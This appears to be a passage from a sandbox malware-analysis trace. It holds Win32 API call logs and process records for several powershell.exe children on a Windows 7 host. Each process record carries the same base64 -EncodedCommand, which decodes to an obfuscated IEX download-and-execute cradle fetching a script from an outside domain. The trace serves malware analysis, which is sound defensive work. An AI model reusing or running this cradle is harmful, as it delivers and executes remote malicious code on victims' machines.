	[0964.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.922] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0964.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.923] CoTaskMemFree (pv=0x28460b0) 
	[0964.930] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0964.931] CoCreateGuid (in: pguid=0x14dfd0 | out: pguid=0x14dfd0*(Data1=0x24598ccb, Data2=0x39ff, Data3=0x425b, Data4=([0]=0x83, [1]=0xb6, [2]=0xbf, [3]=0xef, [4]=0xb, [5]=0x31, [6]=0xb1, [7]=0x10))) returned 0x0
	[0964.933] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0964.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.933] CoTaskMemFree (pv=0x28460b0) 
	[0966.591] WinSqmIsOptedIn () returned 0x0
	[0966.592] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0966.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.592] CoTaskMemFree (pv=0x28460b0) 
	[0966.595] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0966.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.595] CoTaskMemFree (pv=0x28460b0) 
	[0967.563] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0967.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.563] CoTaskMemFree (pv=0x28460b0) 
	[0967.565] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0967.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.566] CoTaskMemFree (pv=0x28460b0) 
	[0967.567] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0967.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.567] CoTaskMemFree (pv=0x28460b0) 
	[0968.938] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0968.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.938] CoTaskMemFree (pv=0x28460b0) 
	[0968.939] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0968.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.939] CoTaskMemFree (pv=0x28460b0) 
	[0968.939] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0968.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.939] CoTaskMemFree (pv=0x28460b0) 
	[0968.941] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0968.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.941] CoTaskMemFree (pv=0x28460b0) 
	[0970.207] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0970.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.207] CoTaskMemFree (pv=0x28460b0) 
	[0970.207] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0970.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.207] CoTaskMemFree (pv=0x28460b0) 
	[0970.208] CoTaskMemAlloc (cb=0x104) returned 0x28460b0
	[0970.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28460b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.208] CoTaskMemFree (pv=0x28460b0) 

Thread:
	id = 742
	os_tid = 0x16dc


Thread:
	id = 755
	os_tid = 0x1724


Thread:
	id = 1251
	os_tid = 0x1c34


Thread:
	id = 1259
	os_tid = 0x1c68


Thread:
	id = 1308
	os_tid = 0x1d90


Thread:
	id = 1377
	os_tid = 0x1f54


Thread:
	id = 1570
	os_tid = 0x2104


Thread:
	id = 1590
	os_tid = 0x2154

	[0819.177] CoGetContextToken (in: pToken=0x1b75f050 | out: pToken=0x1b75f050) returned 0x0
	[0819.177] CObjectContext::QueryInterface () returned 0x0
	[0819.177] CObjectContext::GetCurrentThreadType () returned 0x0
	[0819.177] Release () returned 0x0
	[0819.177] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0892.981] RegCloseKey (hKey=0x2f8) returned 0x0
	[0892.981] RegCloseKey (hKey=0x300) returned 0x0
	[0892.981] RegCloseKey (hKey=0x2fc) returned 0x0

Thread:
	id = 1937
	os_tid = 0x2628


Process:
	id = "147"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4d9c4000"
	os_pid = "0x16bc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 739
	os_tid = 0x16c0

	[0458.095] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 823
	os_tid = 0x10d4


Thread:
	id = 832
	os_tid = 0x111c


Process:
	id = "148"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4aed1000"
	os_pid = "0x171c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 754
	os_tid = 0x1720

	[0465.256] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 854
	os_tid = 0x17d0


Thread:
	id = 868
	os_tid = 0x1098


Process:
	id = "149"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4ade0000"
	os_pid = "0x176c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 758
	os_tid = 0x1770

	[0465.270] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 852
	os_tid = 0x12ec


Thread:
	id = 862
	os_tid = 0x1054


Thread:
	id = 2035
	os_tid = 0x27bc


Thread:
	id = 2037
	os_tid = 0x27c4


Thread:
	id = 2041
	os_tid = 0x27d4


Thread:
	id = 2088
	os_tid = 0x1dd4


Process:
	id = "150"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x42cef000"
	os_pid = "0x17a0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 765
	os_tid = 0x17a4

	[0473.113] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 876
	os_tid = 0x15ec


Thread:
	id = 886
	os_tid = 0xacc


Process:
	id = "151"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x519fd000"
	os_pid = "0x17dc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 774
	os_tid = 0x17e0

	[0473.186] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 875
	os_tid = 0xcb8


Thread:
	id = 885
	os_tid = 0xda8


Thread:
	id = 2133
	os_tid = 0x2450


Thread:
	id = 2134
	os_tid = 0x241c


Thread:
	id = 2136
	os_tid = 0x1d78


Process:
	id = "152"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x459d8000"
	os_pid = "0x17f4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "39"
	os_parent_pid = "0xc60"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 777
	os_tid = 0x17f8

	[0454.168] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0647.074] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0653.765] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0653.767] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0653.767] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0653.767] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0674.226] GetVersionExW (in: lpVersionInformation=0x1cdee0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdee0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0674.228] GetVersionExW (in: lpVersionInformation=0x1cdee0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdee0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0674.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.242] GetVersionExW (in: lpVersionInformation=0x1cdc50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdc50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0674.243] SetErrorMode (uMode=0x1) returned 0x1
	[0674.244] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cddb0 | out: lpFileInformation=0x1cddb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0674.245] SetErrorMode (uMode=0x1) returned 0x1
	[0674.248] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ce020 | out: lpdwHandle=0x1ce020) returned 0x94c
	[0675.649] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cf72a0 | out: lpData=0x2cf72a0) returned 1
	[0675.652] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdf98, puLen=0x1cdf90 | out: lplpBuffer=0x1cdf98*=0x2cf733c, puLen=0x1cdf90) returned 1
	[0675.655] lstrlenW (lpString="䅁") returned 1
	[0675.664] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf7418, puLen=0x1cdf00) returned 1
	[0675.665] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0675.667] CoTaskMemAlloc (cb=0x2e) returned 0x28d520
	[0675.667] lstrcpyW (in: lpString1=0x28d520, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0675.668] CoTaskMemFree (pv=0x28d520) 
	[0675.668] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf746c, puLen=0x1cdf00) returned 1
	[0675.668] lstrlenW (lpString="System.Management.Automation") returned 28
	[0675.669] CoTaskMemAlloc (cb=0x3c) returned 0x1f9e80
	[0675.669] lstrcpyW (in: lpString1=0x1f9e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0675.669] CoTaskMemFree (pv=0x1f9e80) 
	[0675.669] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf74c8, puLen=0x1cdf00) returned 1
	[0675.669] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0675.669] CoTaskMemAlloc (cb=0x20) returned 0x2c1e60
	[0675.669] lstrcpyW (in: lpString1=0x2c1e60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0675.669] CoTaskMemFree (pv=0x2c1e60) 
	[0675.669] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf7508, puLen=0x1cdf00) returned 1
	[0675.669] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0675.669] CoTaskMemAlloc (cb=0x44) returned 0x1f9e80
	[0675.669] lstrcpyW (in: lpString1=0x1f9e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0675.669] CoTaskMemFree (pv=0x1f9e80) 
	[0675.669] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf7570, puLen=0x1cdf00) returned 1
	[0675.669] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0675.669] CoTaskMemAlloc (cb=0x76) returned 0x25e4a0
	[0675.669] lstrcpyW (in: lpString1=0x25e4a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0675.670] CoTaskMemFree (pv=0x25e4a0) 
	[0675.670] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf760c, puLen=0x1cdf00) returned 1
	[0675.670] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0675.670] CoTaskMemAlloc (cb=0x44) returned 0x1f9e80
	[0675.670] lstrcpyW (in: lpString1=0x1f9e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0675.670] CoTaskMemFree (pv=0x1f9e80) 
	[0675.670] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf7670, puLen=0x1cdf00) returned 1
	[0675.670] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0675.670] CoTaskMemAlloc (cb=0x58) returned 0x246b20
	[0675.670] lstrcpyW (in: lpString1=0x246b20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0675.670] CoTaskMemFree (pv=0x246b20) 
	[0675.670] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf76ec, puLen=0x1cdf00) returned 1
	[0675.670] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0675.670] CoTaskMemAlloc (cb=0x20) returned 0x2c1e60
	[0675.670] lstrcpyW (in: lpString1=0x2c1e60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0675.670] CoTaskMemFree (pv=0x2c1e60) 
